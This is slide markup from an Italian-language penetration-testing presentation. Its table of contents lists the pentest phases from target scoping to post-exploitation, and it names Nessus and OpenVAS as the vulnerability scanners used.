          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="719957" y="5284522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dei servizi esposti dalla macchina</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="101" name="Google Shape;2686;p43">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F4535016-F30C-8954-26C5-82F629890E3C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="630466" y="490996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Enumerating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Target</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="102" name="Google Shape;2686;p43">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A49380DD-6FA6-B454-5070-7426BFA0D50C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="631769" y="402451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3" name="Google Shape;2685;p43">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{8FBB894C-1FF8-7D81-16BB-969484823587}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3477367" y="52846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 dei problemi di sicurezza della macchina</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="104" name="Google Shape;2686;p43">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{AEB2C201-EB3D-AD5D-B471-9A67BFBAA78D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3387876" y="49100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</a:t>
            </a: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Mapping</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="105" name="Google Shape;2686;p43">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{4071A593-F62C-6F5D-6229-96CBDE5FC1C4}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3389179" y="40246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Google Shape;2685;p43">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{974F0F60-73FF-9152-0B82-3AE630A4C40F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6239989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Sfruttamento delle vulnerabilità identificate</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="107" name="Google Shape;2686;p43">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{55A3F5AA-7955-2BD0-810C-4F774F96E6FC}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6150498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Exploitation</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="108" name="Google Shape;2686;p43">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E6D69C5A-300A-813F-52B4-58346641FCDE}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6151801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Google Shape;2685;p43">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{71B8FCE1-50DE-B51C-50D9-AEAF9E6F3827}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8994792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Privilege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Escalation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Mantaining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Access</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="110" name="Google Shape;2686;p43">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E3BAFCFD-E52D-C16E-E72C-CC4CAA299C7D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8905301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Post Exploitation</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="111" name="Google Shape;2686;p43">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{FDC0D109-E6E8-8745-A06D-F862BDE306F1}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8906604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1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tangolo 121">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{8C0A454C-8EBE-BFD1-BDE1-5AFF67ED2052}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8895339" y="3859506"/>
            <a:ext cx="2611973" cy="230096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2D574A72-4333-EDA4-E272-AF58B0A83CFB}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6142669" y="3859506"/>
            <a:ext cx="2611973" cy="230096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3064F1B-4547-A3B6-A9B2-E4A016EFB1D1}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6148797" y="1360665"/>
            <a:ext cx="2611973" cy="236512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9DAA0B11-ADC5-7C57-6D63-115CF6E911D6}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8895340" y="1360952"/>
            <a:ext cx="2611973" cy="236512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2656F24F-3B3F-3B62-D95C-6128286003FC}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3402253" y="3859506"/>
            <a:ext cx="2611973" cy="230096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74219E84-0E88-40C4-C060-721FB1639B36}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3402254" y="1348172"/>
            <a:ext cx="2611973" cy="236512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DD2DD3BF-1E82-13F6-8CC2-2E630E328286}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="630467" y="3859506"/>
            <a:ext cx="2611973" cy="230096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8EDEF159-E7E1-CED4-924E-33310161E37E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="629418" y="1348173"/>
            <a:ext cx="2611973" cy="236512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B9F3C-8AD4-65DA-DD79-DA0F801F92AD}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="53449" y="298112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TABLE OF CONTENT</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="53" name="Google Shape;2685;p43">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{BC90CC3D-05EE-6228-5A5A-6E9C219BAEAF}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="718908" y="2803267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Uno sguardo agli strumenti utilizzati nelle varie fasi</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="54" name="Google Shape;2686;p43">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B793AF34-6614-AEA2-96F9-B50AE3CFF52E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="629417" y="242871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Strumenti Utilizzati</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="59" name="Google Shape;2686;p43">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{911EC704-3F17-828E-E68E-CD745D28D0A8}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="630720" y="154326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1</a:t>
            </a:r>
            <a:endParaRPr lang="it-IT" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="65" name="Google Shape;2685;p43">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{11B312B6-A920-5A54-5724-D7CF16D56138}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3476318" y="28033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“Scope” di cosa è stato analizzato</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="66" name="Google Shape;2686;p43">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{BC4F4BB3-1CB0-3FD5-5EC6-F319DCE226E0}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3386827" y="24288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Target </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0" err="1"/>
              <a:t>Scoping</a:t>
            </a:r>
            <a:endParaRPr lang="it-IT" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="67" name="Google Shape;2686;p43">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F7B1D64F-9D4F-A16C-C85C-964D00932EA4}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3388130" y="15433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2</a:t>
            </a:r>
            <a:endParaRPr lang="it-IT" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="69" name="Google Shape;2685;p43">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D2A1E0E7-1AA4-186E-5AEF-8AEF4132AA0F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6238940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Recupero delle informazioni</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="70" name="Google Shape;2686;p43">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{58708409-AA91-4FC6-7665-6A5061A16B4B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6149449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Information </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0" err="1"/>
              <a:t>Gathering</a:t>
            </a:r>
            <a:endParaRPr lang="it-IT" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="71" name="Google Shape;2686;p43">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A43A0249-E69B-B8D4-9A81-F8DEDFC6BCE4}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6150752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3</a:t>
            </a:r>
            <a:endParaRPr lang="it-IT" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="81" name="Google Shape;2685;p43">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{6219FA9C-AAF6-4C2A-6056-7244FA6A71BF}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8993743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Individuazione della macchina </a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="82" name="Google Shape;2686;p43">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B501273F-AFF0-F8BF-F9A6-E80D23535575}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8904252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Target Discovery</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="83" name="Google Shape;2686;p43">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A8EF3834-B6F7-56F4-C86A-B487A5C68A08}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8905555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4</a:t>
            </a:r>
            <a:endParaRPr lang="it-IT" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="100" name="Google Shape;2685;p43">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{5322EF44-D519-CCB9-7D23-AB6F07BB05E8}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="719957" y="5284522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Individuazione dei servizi esposti dalla macchina</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="101" name="Google Shape;2686;p43">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F4535016-F30C-8954-26C5-82F629890E3C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="630466" y="490996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Enumerating</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0"/>
              <a:t> Target</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="102" name="Google Shape;2686;p43">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A49380DD-6FA6-B454-5070-7426BFA0D50C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="631769" y="402451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5</a:t>
            </a:r>
            <a:endParaRPr lang="it-IT" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="103" name="Google Shape;2685;p43">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{8FBB894C-1FF8-7D81-16BB-969484823587}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3477367" y="52846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Analisi dei problemi di sicurezza della macchina</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="104" name="Google Shape;2686;p43">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{AEB2C201-EB3D-AD5D-B471-9A67BFBAA78D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3387876" y="49100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Vulnerability</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0"/>
              <a:t> Mapping</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="105" name="Google Shape;2686;p43">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{4071A593-F62C-6F5D-6229-96CBDE5FC1C4}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3389179" y="40246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6</a:t>
            </a:r>
            <a:endParaRPr lang="it-IT" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="106" name="Google Shape;2685;p43">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{974F0F60-73FF-9152-0B82-3AE630A4C40F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6239989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Sfruttamento delle vulnerabilità identificate</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="107" name="Google Shape;2686;p43">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{55A3F5AA-7955-2BD0-810C-4F774F96E6FC}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6150498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Target Exploitation</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="108" name="Google Shape;2686;p43">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E6D69C5A-300A-813F-52B4-58346641FCDE}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6151801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7</a:t>
            </a:r>
            <a:endParaRPr lang="it-IT" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="109" name="Google Shape;2685;p43">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{71B8FCE1-50DE-B51C-50D9-AEAF9E6F3827}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8994792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Privilege</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0"/>
              <a:t> Escalation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Mantaining</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0"/>
              <a:t> Access</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="110" name="Google Shape;2686;p43">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E3BAFCFD-E52D-C16E-E72C-CC4CAA299C7D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8905301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Post Exploitation</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="111" name="Google Shape;2686;p43">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{FDC0D109-E6E8-8745-A06D-F862BDE306F1}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8906604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422202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Vulnerability mapping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Analisi</a:t>
            </a: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 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" cap="all" spc="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automatiche</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2800" cap="all" spc="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9" name="Immagine 8" descr="Immagine che contiene testo, schermata, diagramma, linea">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{42FE1A66-4E15-9DED-F5DF-E99BDB534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00" y="3853841"/>
            <a:ext cx="6571264" cy="2223243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C0000FE7-13DE-0410-C6B7-1F8E4D67463B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1249416" y="1846073"/>
            <a:ext cx="4164098" cy="364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I tool con cui sono state effettuate analisi automatiche sono stati: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600" b="1" dirty="0" err="1"/>
              <a:t>Nessus</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1600" b="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1600" dirty="0"/>
              <a:t>(Basic </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1600" dirty="0" err="1"/>
              <a:t>Scan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1600" dirty="0"/>
              <a:t>)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600" b="1" dirty="0" err="1"/>
              <a:t>OpenVas</a:t>
            </a:r>
            <a:endParaRPr lang="it-IT" sz="1600" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="14" name="Immagine 13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0F36F6D6-7735-B3B8-D89C-6EF5314BD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61" y="2781819"/>
